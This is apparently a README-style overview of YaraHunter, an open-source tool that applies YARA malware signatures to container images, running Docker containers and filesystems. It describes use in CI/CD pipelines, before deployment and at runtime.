YaraHunter

YaraHunter scans container images, active Docker containers, and filesystems to identify signs of malware.

It employs a YARA ruleset to detect resources that correspond with known malware signatures, which may suggest that the container or filesystem has been compromised. YaraHunter can be utilized in the following ways: - At build-and-test: scan build artifacts within the CI/CD pipeline, providing reports on potential indicators of malware. - At rest: scan local container images, for instance, before deployment, to ensure they are free from malware. - At runtime: scan active Docker containers, especially if there are signs of unusual network traffic or CPU usage. - Against filesystems: at any time, YaraHunter can examine local filesystems for indicators of compromise. Key capabilities include: - Scanning both running and at-rest containers. - Scanning filesystems. - Scanning during CI/CD build processes. It can run anywhere: highly portable in a Docker container format. Designed for automation: easy to deploy and provides easily interpretable JSON output. YaraHunter is currently a work-in-progress (please refer to the Roadmap and issues list) and will be integrated into the ThreatMapper threat discovery platform. We welcome contributions to enhance this tool.